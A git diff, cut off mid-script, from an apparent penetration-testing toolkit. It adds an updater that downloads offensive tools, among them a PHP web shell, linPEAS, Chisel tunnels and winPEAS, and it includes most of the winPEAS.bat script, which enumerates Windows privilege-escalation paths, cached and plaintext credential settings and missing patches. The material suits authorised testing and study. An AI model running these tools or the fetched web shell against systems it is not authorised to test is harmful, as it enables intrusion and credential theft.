"${checkfilename}"`_main + `basename "${checkfilename}"`_fini fi done else - echo "No SSH agents found" -fi - -# Check for any GPG agents running on the box -section "Checking for GPG agents" -AGENTS=`ps -ef | grep gpg-agent | grep -v grep` -if [ -n "$AGENTS" ]; then - echo "WARNING: There are GPG agents running on this system:" - ps aux | grep gpg-agent | grep -v grep -else - echo "No GPG agents found" -fi - -# Check files in /etc/init.d/* can't be modified by non-root users -section "Checking startup files (init.d / rc.d) aren't writable" -for DIR in /etc/init.d /etc/rc.d /usr/local/etc/rc.d; do - if [ -d "$DIR" ]; then - for FILE in $DIR/*; do - F=`echo "$FILE" | sed 's/^.*\///'` - if [ "$F" = "*" ]; then - echo "No user startup script found in $DIR. Skipping checks." - continue - fi - echo Processing startup script $FILE - check_called_programs "$FILE is run by root at startup." $FILE root + if [ ! -d "lib/checks/enabled/${TYPE}" ] + then + stdio_message_error "upc" "the provided check type '${TYPE}' does not exist" + else + for checkfilename in lib/checks/enabled/${TYPE}/* + do + . "${checkfilename}" + `basename "${checkfilename}"`_init + `basename "${checkfilename}"`_main + `basename "${checkfilename}"`_fini done fi -done - -section "Checking if running programs are writable" -if [ $OS = "solaris" ]; then - # use the output of ps command - ps -ef -o user,comm | while read LINE - do - USER=`echo "$LINE" | awk '{print $1}'` - PROG=`echo "$LINE" | awk '{print $2}'` - check_called_programs "$PROG is currently running as $USER." "$PROG" "$USER" - done -elif [ $OS = "bsd" ]; then - # use the output of ps command - ps aux | while read LINE - do - USER=`echo "$LINE" | awk '{print $1}'` - PROG=`echo "$LINE" | awk '{print $11}'` - check_called_programs "$PROG is currently running as $USER." "$PROG" "$USER" - done -elif [ $OS = "hpux" ]; then - # use the output of ps command - ps -ef | while read LINE - do - USER=`echo "$LINE" | awk '{print $1}'` - PROG1=`echo "$LINE" | awk '{print $8}'` - PROG2=`echo "$LINE" | awk '{print $9}'` - if [ -f "$PROG1" ]; then - check_called_programs "$PROG is currently running as $USER." "$PROG1" "$USER" - fi - if [ -f "$PROG2" ]; then - check_called_programs "$PROG is currently running as $USER." "$PROG2" "$USER" - fi - done -elif [ $OS = "linux" ]; then - # use the /proc file system - for PROCDIR in /proc/[0-9]*; do - unset PROGPATH - PID=`echo $PROCDIR | cut -f 3 -d /` - echo ------------------------ - echo "PID: $PID" - if [ -d "$PROCDIR" ]; then - if [ -r "$PROCDIR/exe" ]; then - PROGPATH=`ls -l "$PROCDIR/exe" 2>&1 | sed 's/ (deleted)//' | awk '{print $NF}'` - else - if [ -r "$PROCDIR/cmdline" ]; then - P=`cat $PROCDIR/cmdline | tr "\0" = | cut -f 1 -d = | grep '^/'` - if [ -z "$P" ]; then - echo "ERROR: Can't find full path of running program: "`cat $PROCDIR/cmdline` - else - PROGPATH=$P - fi - else - echo "ERROR: Can't find full path of running program: "`cat $PROCDIR/cmdline` - continue - fi - fi - get_owner $PROCDIR; OWNER=$GET_OWNER_RETURN - echo "Owner: $OWNER" - else - echo "ERROR: Can't find OWNER. Process has gone." - continue - fi - - if [ -n "$PROGPATH" ]; then - get_owner $PROGPATH; PROGOWNER=$GET_OWNER_RETURN - echo "Program path: $PROGPATH" - check_called_programs "$PROGPATH is currently running as $OWNER." $PROGPATH $OWNER - fi - - if [ "$MODE" == "detailed" ]; then - for FILE in $PROCDIR/fd/*; do - F=`echo "$FILE" | sed 's/^.*\///'` - if [ "$F" = "*" ]; then - continue - fi - check_perms "$FILE is an open file descriptor for process $PID running as $OWNER." $FILE $OWNER - done - fi - done fi +exit 0 diff --git a/update.sh b/update.sh new file mode 100755 index 0000000..91730ac --- /dev/null +++ b/update.sh @@ -0,0 +1,38 @@ +#!/bin/bash + +echo "Updating scripts…" +wget --no-verbose https://raw.githubusercontent.com/initstring/uptux/master/uptux.py -O uptux.py +wget --no-verbose https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh -O unix-privesc-check.sh +wget --no-verbose https://github.com/DominicBreuker/pspy/releases/latest/download/pspy64 -O pspy64 +wget --no-verbose https://github.com/DominicBreuker/pspy/releases/latest/download/pspy32 -O pspy +wget --no-verbose https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -O p0wny-shell.php +wget --no-verbose https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh -O lse.sh +wget --no-verbose https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O linux-exploit-suggester.sh +wget --no-verbose https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/linPEAS/linpeas.sh -O linpeas.sh +wget --no-verbose https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh -O LinEnum.sh +wget --no-verbose https://github.com/stealthcopter/deepce/raw/main/deepce.sh -O deepce.sh + +echo "Updating autorecon…" +wget --no-verbose https://raw.githubusercontent.com/Tib3rius/AutoRecon/master/src/autorecon/autorecon.py -O autorecon.py +wget --no-verbose https://github.com/Tib3rius/AutoRecon/raw/master/src/autorecon/config/global-patterns-default.toml -O autorecon_config/global-patterns.toml +wget --no-verbose https://github.com/Tib3rius/AutoRecon/raw/master/src/autorecon/config/port-scan-profiles-default.toml -O autorecon_config/port-scan-profiles.toml +wget --no-verbose https://github.com/Tib3rius/AutoRecon/raw/master/src/autorecon/config/service-scans-default.toml -O autorecon_config/service-scans.toml + +echo "Updating Chisel…" +location=$(curl -s -I https://github.com/jpillora/chisel/releases/latest | grep -i "location: " | awk '{ print $2 }') +if [[ "$location" =~ ^https://github.com/jpillora/chisel/releases/tag/v(.*) ]]; then + chisel_version=${BASH_REMATCH[1]} + chisel_version=${chisel_version%%[[:space:]]} + curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_386.gz" | gzip -d > chisel + curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_linux_amd64.gz" | gzip -d > chisel64 + curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_windows_386.gz" | gzip -d > win/chisel.exe + curl -s -L "https://github.com/jpillora/chisel/releases/download/v${chisel_version}/chisel_${chisel_version}_windows_amd64.gz" | gzip -d > win/chisel64.exe +fi + +# TODO: add others +echo "Updating windows tools…" +wget --no-verbose https://live.sysinternals.com/accesschk.exe -O win/accesschk.exe +wget --no-verbose https://live.sysinternals.com/accesschk64.exe -O win/accesschk64.exe +wget --no-verbose https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe -O win/winPEAS.exe +wget --no-verbose https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe -O win/winPEASx64.exe +wget --no-verbose https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat -O win/winPEAS.bat diff --git a/win/chisel.exe b/win/chisel.exe index c5c05e5..b8b3d97 100644 Binary files a/win/chisel.exe and b/win/chisel.exe differ diff --git a/win/chisel64.exe b/win/chisel64.exe index 9c47167..918ae09 100644 Binary files a/win/chisel64.exe and b/win/chisel64.exe differ diff --git a/win/winPEAS.bat b/win/winPEAS.bat index 9af6415..da25cd4 100644 --- a/win/winPEAS.bat +++ b/win/winPEAS.bat @@ -1,12 +1,654 @@ ---2021-05-03 18:13:46-- https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat -CA-Zertifikat »/etc/ssl/certs/ca-certificates.crt« wurde geladen -Auflösen des Hostnamens raw.githubusercontent.com (raw.githubusercontent.com)… 185.199.111.133, 185.199.110.133, 185.199.109.133, ... -Verbindungsaufbau zu raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443 … verbunden. -HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK -Länge: 35107 (34K) [text/plain] -Wird in »winPEAS.bat.1« gespeichert. +@ECHO OFF & SETLOCAL EnableDelayedExpansion +TITLE WinPEAS - Windows local Privilege Escalation Awesome Script +COLOR 0F +CALL :SetOnce - 0K .......... .......... .......... .... 100% 13,2M=0,003s +REM :: WinPEAS - Windows local Privilege Escalation Awesome Script +REM :: Code by carlospolop; Re-Write by ThisLimn0 -2021-05-03 18:13:46 (13,2 MB/s) - »winPEAS.bat.1« gespeichert [35107/35107] +REM Registry scan of other drives besides +REM /////true or false +SET long=false +:Splash +ECHO. +CALL :ColorLine " %E%32m((,.,/((((((((((((((((((((/, */%E%97m" +CALL :ColorLine " %E%32m,/*,..*(((((((((((((((((((((((((((((((((,%E%97m" +CALL :ColorLine " %E%32m,*/((((((((((((((((((/, %E%92m.*//((//**,%E%32m .*((((((*%E%97m" +CALL :ColorLine " %E%32m((((((((((((((((* %E%94m*****%E%32m,,,/########## %E%32m.(* ,((((((%E%97m" +CALL :ColorLine " %E%32m(((((((((((/* %E%94m******************%E%32m/####### %E%32m.(. ((((((%E%97m" +CALL :ColorLine " %E%32m((((((.%E%92m.%E%94m******************%E%97m/@@@@@/%E%94m***%E%92m/######%E%32m /((((((%E%97m" +CALL :ColorLine " %E%32m,,.%E%92m.%E%94m**********************%E%97m@@@@@@@@@@(%E%94m***%E%92m,####%E%32m ../(((((%E%97m" +CALL :ColorLine " %E%32m, ,%E%92m%E%94m**********************%E%97m#@@@@@#@@@@%E%94m*********%E%92m##%E%32m((/ /((((%E%97m" +CALL :ColorLine " %E%32m..((%E%92m(##########%E%94m*********%E%97m/#@@@@@@@@@/%E%94m*************%E%32m,,..((((%E%97m" +CALL :ColorLine " %E%32m.((%E%92m(################(/%E%94m******%E%97m/@@@@@#%E%94m****************%E%32m.. /((%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(########################(/%E%94m************************%E%32m..*(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(#############################(/%E%94m********************%E%32m.,(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(##################################(/%E%94m***************%E%32m..(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(######################################(%E%94m************%E%32m..(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(######(,.***.,(###################(..***(/%E%94m*********%E%32m..(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(######*(#####((##################((######/(%E%94m********%E%32m..(%E%97m" +CALL :ColorLine " %E%32m.(%E%92m(##################(/**********(################(%E%94m**%E%32m...(%E%97m" +CALL :ColorLine " %E%32m.((%E%92m(####################/*******(###################%E%32m.((((%E%97m" +CALL :ColorLine " %E%32m.((((%E%92m(############################################/%E%32m /((%E%97m" +CALL :ColorLine " %E%32m..((((%E%92m(#########################################(%E%32m..(((((.%E%97m" +CALL :ColorLine " %E%32m....((((%E%92m(#####################################(%E%32m .((((((.%E%97m" +CALL :ColorLine " %E%32m......((((%E%92m(#################################(%E%32m .(((((((.%E%97m" +CALL :ColorLine " %E%32m(((((((((. ,%E%92m(############################(%E%32m../(((((((((.%E%97m" +CALL :ColorLine " %E%32m(((((((((/, %E%92m,####################(%E%32m/..((((((((((.%E%97m" +CALL :ColorLine " %E%32m(((((((((/,. %E%92m,*//////*,.%E%32m ./(((((((((((.%E%97m" +CALL :ColorLine " %E%32m(((((((((((((((((((((((((((/%E%97m" +ECHO. by carlospolop +ECHO. +ECHO. + +:Advisory +REM // Increase progress in title by n percent +CALL :T_Progress 0 +ECHO./^^!\ Advisory: WinPEAS - Windows local Privilege Escalation Awesome Script +CALL :ColorLine " %E%41mWinPEAS should be used for authorized penetration testing and/or educational purposes only.%E%40;97m" +CALL :ColorLine " %E%41mAny misuse of this software will not be the responsibility of the author or of any other collaborator.%E%40;97m" +CALL :ColorLine " %E%41mUse it at your own networks and/or with the network owner's permission.%E%40;97m" +ECHO. + +:SystemInfo +CALL :ColorLine "%E%32m[*]%E%97m BASIC SYSTEM INFO +CALL :ColorLine " %E%33m[+]%E%97m WINDOWS OS" +ECHO. [i] Check for vulnerabilities for the OS version with the applied patches +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits +systeminfo +ECHO. +CALL :T_Progress 2 + +:ListHotFixes +wmic qfe get Caption,Description,HotFixID,InstalledOn | more +set expl=no +for /f "tokens=3-9" %%a in ('systeminfo') do (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i "2000 XP 2003 2008 vista" && set expl=yes) & (ECHO."%%a %%b %%c %%d %%e %%f %%g" | findstr /i /C:"windows 7" && set expl=yes) +IF "%expl%" == "yes" ECHO. [i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2592799" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-080 patch is NOT installed! (Vulns: XP/SP3,2K3/SP3-afd.sys) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3143141" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-032 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS11-011 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB982799" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-59 patch is NOT installed! (Vulns: 2K8,Vista,7/SP0-Chimichurri) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979683" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-21 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2305420" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-092 patch is NOT installed! (Vulns: 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB981957" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-073 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4013081" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS17-017 patch is NOT installed! (Vulns: 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB977165" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS10-015 patch is NOT installed! (Vulns: 2K,XP,2K3,2K8,Vista,7-User Mode to Ring) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB941693" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS08-025 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB920958" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-049 patch is NOT installed! (Vulns: 2K/SP4-ZwQuerySysInfo) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB914389" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS06-030 patch is NOT installed! (Vulns: 2K,XP/SP2-Mrxsmb.sys) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB908523" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-055 patch is NOT installed! (Vulns: 2K/SP4-APC Data-Free) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB890859" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS05-018 patch is NOT installed! (Vulns: 2K/SP3/4,XP/SP1/2-CSRSS) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB842526" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-019 patch is NOT installed! (Vulns: 2K/SP2/3/4-Utility Manager) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB835732" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-011 patch is NOT installed! (Vulns: 2K/SP2/3/4,XP/SP0/1-LSASS service BoF) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB841872" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS04-020 patch is NOT installed! (Vulns: 2K/SP4-POSIX) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2975684" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-040 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS16-016 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3057191" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS15-051 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2989935" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS14-070 patch is NOT installed! (Vulns: 2K3/SP2-TCP/IP) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2778930" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-005 patch is NOT installed! (Vulns: Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2850851" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-053 patch is NOT installed! (Vulns: 7SP0/SP1_x86-schlamperei) +IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2870008" 1>NUL +IF "%expl%" == "yes" IF errorlevel 1 ECHO.MS13-081 patch is NOT installed! (Vulns: 7SP0/SP1_x86-track_popup_menu) +ECHO. +CALL :T_Progress 2 + +:DateAndTime +CALL :ColorLine " %E%33m[+]%E%97m DATE and TIME" +ECHO. [i] You may need to adjust your local date/time to exploit some vulnerability +date /T +time /T +ECHO. +CALL :T_Progress 2 + +:AuditSettings +CALL :ColorLine " %E%33m[+]%E%97m Audit Settings" +ECHO. [i] Check what is being logged +REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit 2>nul +ECHO. +CALL :T_Progress 1 + +:WEFSettings +CALL :ColorLine " %E%33m[+]%E%97m WEF Settings" +ECHO. [i] Check where are being sent the logs +REG QUERY HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager 2>nul +ECHO. +CALL :T_Progress 1 + +:LAPSInstallCheck +CALL :ColorLine " %E%33m[+]%E%97m LAPS installed?" +ECHO. [i] Check what is being logged +REG QUERY "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled 2>nul +ECHO. +CALL :T_Progress 1 + +:LSAProtectionCheck +CALL :ColorLine " %E%33m[+]%E%97m LSA protection?" +ECHO. [i] Active if "1" +REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v RunAsPPL 2>nul +CALL :T_Progress 1 + +:LSACredentialGuard +CALL :ColorLine " %E%33m[+]%E%97m Credential Guard?" +ECHO. [i] Active if "1" or "2" +REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v LsaCfgFlags 2>nul +ECHO. +CALL :T_Progress 1 + +:LogonCredentialsPlainInMemory +CALL :ColorLine " %E%33m[+]%E%97m WDigest?" +ECHO. [i] Plain-text creds in memory if "1" +reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential 2>nul +ECHO. +CALL :T_Progress 1 + +:CachedCreds +CALL :ColorLine " %E%33m[+]%E%97m Number of cached creds" +ECHO. [i] You need System-rights to extract them +reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CACHEDLOGONSCOUNT 2>nul +CALL :T_Progress 1 + +:UACSettings +CALL :ColorLine " %E%33m[+]%E%97m UAC Settings" +ECHO. [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access +REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 2>nul +ECHO. +CALL :T_Progress 1 + +:AVSettings +CALL :ColorLine " %E%33m[+]%E%97m Registered Anti-Virus(AV)" +WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more +ECHO.Checking for defender whitelisted PATHS +reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" 2>nul +CALL :T_Progress 1 + +:PSSettings +CALL :ColorLine " %E%33m[+]%E%97m PowerShell settings" +ECHO.PowerShell v2 Version: +REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine /v PowerShellVersion 2>nul +ECHO.PowerShell v5 Version: +REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine /v PowerShellVersion 2>nul +ECHO.Transcriptions Settings: +REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription 2>nul +ECHO.Module logging settings: +REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging 2>nul +ECHO.Scriptblog logging settings: +REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging 2>nul +ECHO. +ECHO.PS default transcript history +dir %SystemDrive%\transcripts\ 2>nul +ECHO. +ECHO.Checking PS history file +dir "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" 2>nul +ECHO. +CALL :T_Progress 3 + +:MountedDisks +CALL :ColorLine " %E%33m[+]%E%97m MOUNTED DISKS" +ECHO. [i] Maybe you find something interesting +(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul) +ECHO. +CALL :T_Progress 1 + +:Environment +CALL :ColorLine " %E%33m[+]%E%97m ENVIRONMENT" +ECHO. [i] Interesting information? +ECHO. +set +ECHO. +CALL :T_Progress 1 + +:InstalledSoftware +CALL :ColorLine " %E%33m[+]%E%97m INSTALLED SOFTWARE" +ECHO. [i] Some weird software? Check for vulnerabilities in unknow software installed +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software +ECHO. +dir /b "C:\Program Files" "C:\Program Files (x86)" | sort +reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\" +reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ /s | findstr InstallLocation | findstr ":\\" +IF exist C:\Windows\CCM\SCClient.exe ECHO.SCCM is installed (installers are run with SYSTEM privileges, many are vulnerable to DLL Sideloading) +ECHO. +CALL :T_Progress 2 + +:RemodeDeskCredMgr +CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager" +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager +IF exist "%AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files +ECHO. +CALL :T_Progress 1 + +:WSUS +CALL :ColorLine " %E%33m[+]%E%97m WSUS" +ECHO. [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit) +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus +reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://" +ECHO. +CALL :T_Progress 1 + +:RunningProcesses +CALL :ColorLine " %E%33m[+]%E%97m RUNNING PROCESSES" +ECHO. [i] Something unexpected is running? Check for vulnerabilities +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes +tasklist /SVC +ECHO. +CALL :T_Progress 2 +ECHO. [i] Checking file permissions of running processes (File backdooring - maybe the same files start automatically when Administrator logs in) +for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do ( + for /f eol^=^"^ delims^=^" %%z in ('ECHO.%%x') do ( + icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. + ) +) +ECHO. +ECHO. [i] Checking directory permissions of running processes (DLL injection) +for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('ECHO.%%x') do ( + icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. +) +ECHO. +CALL :T_Progress 3 + +:RunAtStartup +CALL :ColorLine " %E%33m[+]%E%97m RUN AT STARTUP" +ECHO. [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup +::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^ +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ +reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ +reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ +CALL :T_Progress 2 +icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +CALL :T_Progress 2 +icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && ECHO. & ^ +CALL :T_Progress 2 +schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab informa") +ECHO. +CALL :T_Progress 2 + +:AlwaysInstallElevated +CALL :ColorLine " %E%33m[+]%E%97m AlwaysInstallElevated?" +ECHO. [i] If '1' then you can install a .msi file with admin privileges ;) +ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated +reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul +reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul +ECHO. +CALL :T_Progress 2 + +:NetworkShares +CALL :ColorLine "%E%32m[*]%E%97m NETWORK" +CALL :ColorLine " %E%33m[+]%E%97m CURRENT SHARES" +net share +ECHO. +CALL :T_Progress 